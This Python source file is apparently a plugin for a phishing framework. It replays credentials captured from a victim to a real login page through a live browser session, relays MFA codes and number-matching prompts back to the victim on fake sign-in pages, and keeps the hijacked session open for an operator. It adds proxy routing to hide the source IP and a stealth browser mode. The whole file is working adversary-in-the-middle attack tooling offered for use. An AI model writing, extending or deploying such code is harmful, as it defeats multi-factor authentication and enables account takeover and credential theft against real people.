"""
Sync Credential Proxy plugin — real-time credential replay with MFA relay.

Keeps a browser session alive across HTTP requests so that MFA challenges
(OTP input, number-matching) can be relayed back to the victim and answered
in real time.
"""
from typing import Dict, Any, Optional, List
from ..base import BasePlugin
from shared.database import db, CredentialProxyJob, Template
from shared.template_render import render_sandboxed
from datetime import datetime
import logging
import time

logger = logging.getLogger(__name__)

_PLUGIN_VERSION = 6  # bump on each deploy to verify running code


class SyncCredentialProxyPlugin(BasePlugin):
    """
    After credentials are captured, proxy them to the target site in real time.
    If the target site asks for MFA, relay the challenge back to the victim and
    wait for input.  Place this node after Capture Credentials in a POST workflow.
    """

    @property
    def plugin_type(self) -> str:
        return "sync_credential_proxy"

    @property
    def display_name(self) -> str:
        return "Sync Credential Proxy"

    @property
    def description(self) -> str:
        return (
            "Proxy captured credentials to a target site in real time via a live "
            "browser session. Supports MFA relay: if the target site asks for a "
            "verification code or number-matching approval, the challenge is relayed "
            "back to the victim. Place after Capture Credentials in a POST workflow."
        )

    @property
    def plugin_category(self) -> str:
        return "capture"

    @property
    def config_schema(self) -> Dict[str, Any]:
        return {
            "type": "object",
            "properties": {
                "target_url": {
                    "type": "string",
                    "title": "Target Login URL",
                    "description": "The real login page to proxy credentials to",
                    "placeholder": "https://login.example.com",
                },
                "mfa_template_source": {
                    "type": "string",
                    "title": "MFA Page Source",
                    "enum": [
                        {"value": "auto", "label": "Auto-generated", "description": "Simple styled MFA page generated by the plugin"},
                        {"value": "custom", "label": "Custom HTML", "description": "Provide your own HTML template with {{mfa_prompt_text}}, {{mfa_field_name}}, {{form_action}} variables"},
                        {"value": "library", "label": "Template Library", "description": "Use a template from the library"},
                    ],
                    "default": "auto",
                    "description": "How to render the MFA challenge page shown to the victim",
                },
                "mfa_custom_template": {
                    "type": "string",
                    "format": "textarea",
                    "title": "Custom MFA Template HTML",
                    "description": "HTML template when source is 'custom'",
                    "help": "Available variables: {{mfa_prompt_text}}, {{mfa_field_name}}, {{form_action}}, {{display_value}}",
                },
                "mfa_template_id": {
                    "type": "integer",
                    "title": "MFA Template",
                    "description": "Template from library when source is 'library'",
                    "x-optionsSource": "templates",
                },
                "input_field_name": {
                    "type": "string",
                    "title": "MFA Input Field Name",
                    "description": "Form field name for MFA input",
                    "default": "mfa_code",
                },
                "timeout": {
                    "type": "number",
                    "title": "Step Timeout (seconds)",
                    "description": "Timeout per proxy step",
                    "default": 30,
                },
                "session_timeout": {
                    "type": "number",
                    "title": "Session Timeout (seconds)",
                    "description": "Max session lifetime before auto-cleanup",
                    "default": 300,
                },
                "ai_config": {
                    "type": "object",
                    "title": "AI Config",
                    "description": "AI form detector configuration",
                    "help": "Optional. Example: {\"provider\": \"openai\", \"model\": \"gpt-4o\", \"api_key\": \"sk-...\"}. "
                            "Supported providers: openai, anthropic. Omit to use server defaults.",
                },
                "proxy": {
                    "type": "object",
                    "title": "SOCKS/HTTP Proxy",
                    "description": "Route browser traffic through a proxy to change source IP",
                    "help": "Format: {\"server\": \"socks5://host:port\", \"username\": \"...\", \"password\": \"...\"}. "
                            "Supports socks5, socks4, http, https protocols.",
                    "properties": {
                        "server": {
                            "type": "string",
                            "title": "Proxy Server",
                            "description": "Proxy URL (e.g. socks5://1.2.3.4:1080)",
                            "placeholder": "socks5://host:port",
                        },
                        "username": {
                            "type": "string",
                            "title": "Username",
                            "description": "Proxy auth username (optional)",
                        },
                        "password": {
                            "type": "string",
                            "title": "Password",
                            "description": "Proxy auth password (optional)",
                        },
                    },
                },
                "browser_config": {
                    "type": "object",
                    "title": "Browser Config",
                    "description": "Playwright browser options",
                    "help": "Optional. Example: {\"headless\": true, \"stealth_mode\": true, \"viewport\": {\"width\": 1920, \"height\": 1080}, "
                            "\"user_agent\": \"Mozilla/5.0 ...\"}. Proxy can also be set via the dedicated proxy field above.",
                },
            },
            "required": ["target_url"],
        }

    def validate_config(self, config: Dict[str, Any]) -> Optional[List[str]]:
        errors = []
        if not config.get("target_url"):
            errors.append("target_url is required")
        source = config.get("mfa_template_source", "auto")
        if source == "custom" and not config.get("mfa_custom_template"):
            errors.append("mfa_custom_template is required when mfa_template_source is 'custom'")
        if source == "library" and not config.get("mfa_template_id"):
            errors.append("mfa_template_id is required when mfa_template_source is 'library'")
        return errors if errors else None

    def get_branch_context_key(self) -> Optional[str]:
        return "sync_proxy_success"

    def get_branch_labels(self) -> Dict[str, str]:
        return {"true": "Success", "false": "Needs Input / Failed"}

    # -- Execute --

    def execute(self, context: Dict[str, Any], config: Dict[str, Any]) -> Dict[str, Any]:
        session_data = context.get('session', {})
        logger.info(
            f"[SyncProxy v{_PLUGIN_VERSION}] execute() called — "
            f"active_session_id={session_data.get('_sync_proxy_session_id')}, "
            f"form_keys={list(context.get('request', {}).get('form_data', {}).keys())}"
        )
        try:
            from workflows.sync_proxy_manager import get_sync_proxy_manager

            manager = get_sync_proxy_manager()
            if not manager:
                logger.error("SyncProxyManager not initialised")
                context['sync_proxy_success'] = False
                context['_stop_workflow'] = True
                context.pop('_response_redirect', None)
                context['_response_html'] = self._render_error_page("Sync proxy service unavailable")
                return context

            session_data = context.get('session', {})
            active_session_id = session_data.get('_sync_proxy_session_id')
            timeout = int(config.get('timeout', 30))

            # Resolve the active proxy session (if any)
            proxy_session = None
            if active_session_id:
                proxy_session = manager.get_session(active_session_id)
                if not proxy_session:
                    # Session expired or server restarted — clear stale ID and
                    # fall through to the initial path so the user doesn't see
                    # an error on their first attempt after a restart.
                    logger.warning(
                        f"Sync proxy session {active_session_id} not found (expired?), "
                        "clearing stale session and falling through to initial path"
                    )
                    self._set_session_key(context, '_sync_proxy_session_id', None)
                    active_session_id = None

            if proxy_session:
                # Continuation POST — MFA code / approval submission
                input_field = config.get('input_field_name', 'mfa_code')
                form_data = context.get('request', {}).get('form_data', {})
                user_input = form_data.get(input_field, '').strip()

                if not user_input:
                    # Re-render MFA page (user submitted empty)
                    context['sync_proxy_success'] = False
                    context['_stop_workflow'] = True
                    context.pop('_response_redirect', None)
                    context['_response_html'] = self._render_mfa_input_page(
                        config, context,
                        prompt_text='Please enter the verification code',
                        input_type='text',
                    )
                    return context

                result = proxy_session.execute_continue(user_input, timeout=timeout)
            else:
                # First POST — create session and execute initial
                credentials = context.get('captured_credentials')
                if not credentials or not isinstance(credentials, dict):
                    logger.warning("Sync Credential Proxy: No captured_credentials in context")
                    context['sync_proxy_success'] = False
                    context['_stop_workflow'] = True
                    context.pop('_response_redirect', None)
                    context['_response_html'] = self._render_error_page("No credentials captured")
                    return context

                target_url = config.get('target_url', '')
                if not target_url:
                    context['sync_proxy_success'] = False
                    context['_stop_workflow'] = True
                    context.pop('_response_redirect', None)
                    context['_response_html'] = self._render_error_page("No target URL configured")
                    return context

                browser_cfg = dict(config.get('browser_config') or {})
                if config.get('proxy'):
                    browser_cfg['proxy'] = config['proxy']

                proxy_session = manager.create_session(
                    target_url=target_url,
                    credentials=credentials,
                    config={
                        'timeout': timeout,
                        'ai_config': config.get('ai_config'),
                        'browser_config': browser_cfg,
                    },
                )
                # Multi-step logins need more time (AI detection at each step)
                result = proxy_session.execute_initial(timeout=timeout * 3)

            return self._process_result(result, proxy_session, context, config, manager)

        except Exception as e:
            logger.exception(f"Sync Credential Proxy failed: {e}")
            context['sync_proxy_success'] = False
            context['_stop_workflow'] = True
            context.pop('_response_redirect', None)
            error_msg = f"Proxy error: {e}"
            context['_response_html'] = self._render_error_page(error_msg)
            # Create job record so the failure is visible in logs
            try:
                self._create_job_record(context, config,
                                        {'status': 'failed', 'error': error_msg},
                                        'failed', error_message=error_msg)
            except Exception:
                pass
            return context

    # -- Result processing --

    def _process_result(self, result: dict, proxy_session, context: Dict[str, Any],
                        config: Dict[str, Any], manager) -> Dict[str, Any]:
        status = result.get('status', 'failed')
        logger.info(
            f"[SyncProxy v{_PLUGIN_VERSION}] _process_result status={status}, "
            f"cookies={len(result.get('cookies', []))}, "
            f"final_url={result.get('final_url', 'n/a')}"
        )

        # On continuation POSTs the Capture Credentials plugin re-ran with
        # MFA form data, so captured_credentials may be empty.  Fall back
        # to the proxy session's original credentials for the job record.
        if not context.get('captured_credentials'):
            context['captured_credentials'] = getattr(
                proxy_session, 'credentials', {}
            )

        if status == 'success':
            context['sync_proxy_success'] = True
            context['sync_proxy_result'] = result

            # Create CredentialProxyJob record
            self._create_job_record(context, config, result, 'completed')

            # Keep browser alive for operator interaction
            proxy_session.state = 'operator_available'
            proxy_session.last_activity = time.time()

            # Let the workflow continue — downstream nodes (e.g. Render Template,
            # Redirect) handle the response shown to the victim.

        elif status == 'needs_input':
            context['sync_proxy_success'] = False
            context['_stop_workflow'] = True
            context.pop('_response_redirect', None)  # kill any redirect — HTML must win
            context['_response_html'] = self._render_mfa_input_page(
                config, context,
                prompt_text=result.get('prompt_text', 'Enter verification code'),
                input_type=result.get('input_type', 'text'),
            )
            self._set_session_key(context, '_sync_proxy_session_id', proxy_session.session_id)
            self._create_job_record(context, config, result, 'mfa_prompted')

        elif status == 'needs_display':
            context['sync_proxy_success'] = False
            context['_stop_workflow'] = True
            context.pop('_response_redirect', None)
            context['_response_html'] = self._render_number_matching_page(
                config, context,
                display_value=result.get('display_value', ''),
                prompt_text=result.get('prompt_text', 'Approve the sign-in request'),
                session_id=proxy_session.session_id,
            )
            self._set_session_key(context, '_sync_proxy_session_id', proxy_session.session_id)
            self._create_job_record(context, config, result, 'mfa_prompted')

        else:  # failed / timeout
            context['sync_proxy_success'] = False
            context['_stop_workflow'] = True
            context.pop('_response_redirect', None)
            error_msg = result.get('error', 'Proxy failed')
            context['_response_html'] = self._render_error_page(error_msg)

            self._create_job_record(context, config, result, 'failed',
                                    error_message=error_msg)
            manager.remove_session(proxy_session.session_id)
            self._set_session_key(context, '_sync_proxy_session_id', None)

        return context

    # -- Session helper --

    @staticmethod
    def _set_session_key(context: Dict[str, Any], key: str, value):
        """Set or remove a key in the Flask session via _set_session."""
        existing = context.get('_set_session')
        if not isinstance(existing, dict):
            existing = {}
        if value is None:
            existing[key] = ''  # empty string clears it
        else:
            existing[key] = value
        context['_set_session'] = existing

    # -- DB record --

    def _create_job_record(self, context, config, result, status,
                           error_message=None):
        try:
            campaign_id = context.get('campaign', {}).get('id')
            if not campaign_id:
                logger.warning("Cannot create job record: no campaign_id in context")
                return
            # Keep result data as-is — screenshots are already size-limited
            # by _take_result_screenshot() (max ~500KB each)
            safe_result = dict(result) if result and isinstance(result, dict) else {}
            job = CredentialProxyJob(
                campaign_id=campaign_id,
                credentials=context.get('captured_credentials') or {},
                target_sites=[{'url': config.get('target_url', '')}],
                status=status,
                results=safe_result,
                error_message=error_message,
                ai_config=config.get('ai_config') or {},
                browser_config=config.get('browser_config') or {},
                automation_timeout=int(config.get('timeout', 30)),
                max_retries=0,
                proxy_mode='sync',
                completed_at=datetime.utcnow(),
            )
            db.session.add(job)
            db.session.commit()
            context['credential_proxy_job_id'] = job.id
            logger.info(f"Created sync credential proxy job {job.id}")
        except Exception as e:
            logger.exception(f"Failed to create sync proxy job record: {e}")
            db.session.rollback()

    # -- Page rendering --

    def _render_mfa_input_page(self, config, context, prompt_text: str,
                                input_type: str = 'text') -> str:
        source = config.get('mfa_template_source', 'auto')
        input_field = config.get('input_field_name', 'mfa_code')
        campaign_uid = context.get('campaign', {}).get('uid', '')
        form_action = f'/{campaign_uid}' if campaign_uid else '/'

        # Expose captured credentials as 'target' for template interpolation
        # so templates can use {{target.email}}, {{target.username}}, etc.
        creds = context.get('captured_credentials') or {}
        target = {k: v for k, v in creds.items() if k != 'password'}
        # Ensure 'email' is always available (may be stored as 'username')
        if 'email' not in target and 'username' in target:
            target['email'] = target['username']
        elif 'username' not in target and 'email' in target:
            target['username'] = target['email']

        template_vars = {
            'mfa_prompt_text': prompt_text,
            'mfa_field_name': input_field,
            'form_action': form_action,
            'input_type': input_type,
            'target': target,
        }

        if source == 'custom':
            return self._render_custom_template(
                config.get('mfa_custom_template', ''), template_vars, context
            )
        elif source == 'library':
            return self._render_library_template(
                config.get('mfa_template_id'), template_vars, context
            )
        else:
            return self._render_auto_mfa_page(template_vars)

    def _render_number_matching_page(self, config, context, display_value: str,
                                      prompt_text: str, session_id: str) -> str:
        source = config.get('mfa_template_source', 'auto')
        input_field = config.get('input_field_name', 'mfa_code')
        campaign_uid = context.get('campaign', {}).get('uid', '')
        form_action = f'/{campaign_uid}' if campaign_uid else '/'
        poll_url = f'/{campaign_uid}/proxy-status/{session_id}' if campaign_uid else f'/proxy-status/{session_id}'

        # Expose captured credentials as 'target' for template interpolation
        creds = context.get('captured_credentials') or {}
        target = {k: v for k, v in creds.items() if k != 'password'}
        # Ensure 'email' is always available (may be stored as 'username')
        if 'email' not in target and 'username' in target:
            target['email'] = target['username']
        elif 'username' not in target and 'email' in target:
            target['username'] = target['email']

        template_vars = {
            'mfa_prompt_text': prompt_text,
            'mfa_field_name': input_field,
            'form_action': form_action,
            'display_value': display_value,
            'poll_url': poll_url,
            'session_id': session_id,
            'target': target,
        }

        if source == 'custom':
            return self._render_custom_template(
                config.get('mfa_custom_template', ''), template_vars, context
            )
        elif source == 'library':
            return self._render_library_template(
                config.get('mfa_template_id'), template_vars, context
            )
        else:
            return self._render_auto_number_matching_page(template_vars)

    @staticmethod
    def _render_jinja(template_html: str, template_vars: dict, context: dict) -> str:
        """Render an MFA prompt template in a sandboxed Jinja2 env.

        Variable values are never re-parsed (no second pass), and parse-time
        Python escape gadgets raise SecurityError. On any render failure return
        a static error page rather than serving a half-rendered template.
        """
        merged = {**context, **template_vars}
        try:
            return render_sandboxed(template_html, merged)
        except Exception as e:
            logger.warning(f"Sandboxed Jinja2 render failed: {e}")
            return (
                "<html><body><h1>Template error</h1>"
                "<p>The MFA prompt template could not be rendered.</p></body></html>"
            )

    @staticmethod
    def _render_custom_template(template_html: str, template_vars: dict,
                                 context: dict) -> str:
        try:
            html = SyncCredentialProxyPlugin._render_jinja(template_html, template_vars, context)
            # Inject polling script for number-matching pages
            html = SyncCredentialProxyPlugin._inject_poll_script(html, template_vars)
            return html
        except Exception as e:
            logger.error(f"Custom MFA template rendering failed: {e}")
            return SyncCredentialProxyPlugin._render_auto_mfa_page(template_vars)

    @staticmethod
    def _render_library_template(template_id, template_vars: dict,
                                  context: dict) -> str:
        try:
            if not template_id:
                return SyncCredentialProxyPlugin._render_auto_mfa_page(template_vars)
            template = Template.query.get(template_id)
            if not template or not template.template_html:
                logger.warning(f"MFA template {template_id} not found")
                return SyncCredentialProxyPlugin._render_auto_mfa_page(template_vars)
            html = SyncCredentialProxyPlugin._render_jinja(
                template.template_html, template_vars, context
            )
            # Inject polling script for number-matching pages
            html = SyncCredentialProxyPlugin._inject_poll_script(html, template_vars)
            return html
        except Exception as e:
            logger.error(f"Library MFA template rendering failed: {e}")
            return SyncCredentialProxyPlugin._render_auto_mfa_page(template_vars)

    @staticmethod
    def _inject_poll_script(html: str, template_vars: dict) -> str:
        """Inject approval-polling JS into custom/library templates for number-matching pages.
        Only injects when poll_url is present (needs_display flow).
        Skips injection if the template already references the poll URL or path,
        so authors who write their own polling don't get a duplicate loop."""
        poll_url = template_vars.get('poll_url')
        if not poll_url:
            return html  # not a number-matching page

        # Idempotent: if the template already polls, skip injection.
        if poll_url in html or 'proxy-status/' in html:
            return html

        import html as html_mod
        form_action = html_mod.escape(template_vars.get('form_action', '/'))
        field_name = html_mod.escape(template_vars.get('mfa_field_name', 'mfa_code'))
        poll_safe = html_mod.escape(poll_url)

        script = (
            f'\n<!-- sync proxy approval polling -->'
            f'\n<form id="_sp_approval_form" method="POST" action="{form_action}" style="display:none">'
            f'\n  <input type="hidden" name="{field_name}" value="approved">'
            f'\n</form>'
            f'\n<script>'
            f'\n(function(){{'
            f'\n  var pollUrl = "{poll_safe}";'
            f'\n  var iv = setInterval(function(){{'
            f'\n    fetch(pollUrl, {{credentials:"same-origin"}})'
            f'\n      .then(function(r){{return r.json();}})'
            f'\n      .then(function(d){{'
            f'\n        if(d.status==="approved"){{clearInterval(iv);document.getElementById("_sp_approval_form").submit();}}'
            f'\n        else if(d.status==="failed"||d.status==="timeout"){{clearInterval(iv);}}'
            f'\n      }}).catch(function(){{}});'
            f'\n  }}, 3000);'
            f'\n}})();'
            f'\n</script>'
        )

        # Insert before </body> if present, otherwise append
        if '</body>' in html.lower():
            import re
            html = re.sub(r'(</body>)', script + r'\1', html, count=1, flags=re.IGNORECASE)
        else:
            html += script

        return html

    @staticmethod
    def _render_auto_mfa_page(v: dict) -> str:
        prompt = v.get('mfa_prompt_text', 'Enter verification code')
        field = v.get('mfa_field_name', 'mfa_code')
        action = v.get('form_action', '/')
        input_type = v.get('input_type', 'text')
        # Escape for safe HTML embedding
        import html as html_mod
        prompt_safe = html_mod.escape(prompt)
        field_safe = html_mod.escape(field)
        action_safe = html_mod.escape(action)
        return f"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Verification Required</title>
<style>
  * {{ margin: 0; padding: 0; box-sizing: border-box; }}
  body {{ font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: #f5f5f5; display: flex; justify-content: center; align-items: center; min-height: 100vh; }}
  .card {{ background: #fff; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); padding: 40px; max-width: 420px; width: 100%; text-align: center; }}
  .card h2 {{ color: #333; margin-bottom: 12px; font-size: 1.4em; }}
  .card p {{ color: #666; margin-bottom: 24px; font-size: 0.95em; }}
  .card input[type="text"], .card input[type="number"] {{ width: 100%; padding: 12px 16px; border: 1px solid #ddd; border-radius: 6px; font-size: 1.1em; text-align: center; letter-spacing: 4px; margin-bottom: 20px; }}
  .card input:focus {{ outline: none; border-color: #0078d4; box-shadow: 0 0 0 2px rgba(0,120,212,0.2); }}
  .card button {{ width: 100%; padding: 12px; background: #0078d4; color: #fff; border: none; border-radius: 6px; font-size: 1em; cursor: pointer; }}
  .card button:hover {{ background: #106ebe; }}
</style>
</head>
<body>
<div class="card">
  <h2>Verification Required</h2>
  <p>{prompt_safe}</p>
  <form method="POST" action="{action_safe}">
    <input type="{input_type}" name="{field_safe}" autocomplete="one-time-code" required autofocus placeholder="Enter code">
    <button type="submit">Verify</button>
  </form>
</div>
</body>
</html>"""

    @staticmethod
    def _render_auto_number_matching_page(v: dict) -> str:
        prompt = v.get('mfa_prompt_text', 'Approve the sign-in request')
        display = v.get('display_value', '')
        action = v.get('form_action', '/')
        field = v.get('mfa_field_name', 'mfa_code')
        poll_url = v.get('poll_url', '')
        import html as html_mod
        prompt_safe = html_mod.escape(prompt)
        display_safe = html_mod.escape(display)
        action_safe = html_mod.escape(action)
        field_safe = html_mod.escape(field)
        poll_safe = html_mod.escape(poll_url)
        return f"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Approve Sign-in</title>
<style>
  * {{ margin: 0; padding: 0; box-sizing: border-box; }}
  body {{ font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: #f5f5f5; display: flex; justify-content: center; align-items: center; min-height: 100vh; }}
  .card {{ background: #fff; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); padding: 40px; max-width: 420px; width: 100%; text-align: center; }}
  .card h2 {{ color: #333; margin-bottom: 12px; font-size: 1.4em; }}
  .card p {{ color: #666; margin-bottom: 24px; font-size: 0.95em; }}
  .number {{ font-size: 3em; font-weight: 700; color: #0078d4; margin: 20px 0; letter-spacing: 4px; }}
  .spinner {{ display: inline-block; width: 24px; height: 24px; border: 3px solid #ddd; border-top-color: #0078d4; border-radius: 50%; animation: spin 1s linear infinite; margin-right: 8px; vertical-align: middle; }}
  @keyframes spin {{ to {{ transform: rotate(360deg); }} }}
  .status {{ color: #888; font-size: 0.9em; margin-top: 20px; }}
</style>
</head>
<body>
<div class="card">
  <h2>Approve Sign-in</h2>
  <p>{prompt_safe}</p>
  <div class="number">{display_safe}</div>
  <p class="status"><span class="spinner"></span> Waiting for approval...</p>
  <form id="approval-form" method="POST" action="{action_safe}" style="display:none">
    <input type="hidden" name="{field_safe}" value="approved">
  </form>
</div>
<script>
(function() {{
  var pollUrl = "{poll_safe}";
  var interval = setInterval(function() {{
    fetch(pollUrl, {{ credentials: 'same-origin' }})
      .then(function(r) {{ return r.json(); }})
      .then(function(data) {{
        if (data.status === 'approved') {{
          clearInterval(interval);
          document.getElementById('approval-form').submit();
        }} else if (data.status === 'failed' || data.status === 'timeout') {{
          clearInterval(interval);
          document.querySelector('.status').innerHTML = 'Sign-in failed. Please try again.';
        }}
      }})
      .catch(function() {{}});
  }}, 3000);
}})();
</script>
</body>
</html>"""

    def _render_success_page(self, config, context, result) -> str:
        """Render a page shown to the victim after successful credential proxy.
        Always uses the auto spinner page — library/custom MFA templates are
        designed for code input and show an empty form if reused here."""
        target_url = config.get('target_url', '')

        # Default: simple loading/redirect page
        import html as html_mod
        target_safe = html_mod.escape(target_url) if target_url else ''
        return f"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Signing in...</title>
<style>
  * {{ margin: 0; padding: 0; box-sizing: border-box; }}
  body {{ font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: #f5f5f5; display: flex; justify-content: center; align-items: center; min-height: 100vh; }}
  .card {{ background: #fff; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); padding: 40px; max-width: 420px; width: 100%; text-align: center; }}
  .spinner {{ display: inline-block; width: 32px; height: 32px; border: 3px solid #ddd; border-top-color: #0078d4; border-radius: 50%; animation: spin 1s linear infinite; margin-bottom: 16px; }}
  @keyframes spin {{ to {{ transform: rotate(360deg); }} }}
  p {{ color: #666; font-size: 0.95em; }}
</style>
</head>
<body>
<div class="card">
  <div class="spinner"></div>
  <p>Completing sign-in...</p>
</div>
</body>
</html>"""

    @staticmethod
    def _render_error_page(message: str) -> str:
        import html as html_mod
        msg_safe = html_mod.escape(message)
        return f"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Error</title>
<style>
  body {{ font-family: 'Segoe UI', sans-serif; background: #f5f5f5; display: flex; justify-content: center; align-items: center; min-height: 100vh; }}
  .card {{ background: #fff; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); padding: 40px; max-width: 420px; width: 100%; text-align: center; }}
  .card h2 {{ color: #d13438; margin-bottom: 12px; }}
  .card p {{ color: #666; }}
</style>
</head>
<body>
<div class="card">
  <h2>Something went wrong</h2>
  <p>{msg_safe}</p>
  <p style="margin-top:16px"><a href="javascript:history.back()">Go back</a></p>
</div>
</body>
</html>"""
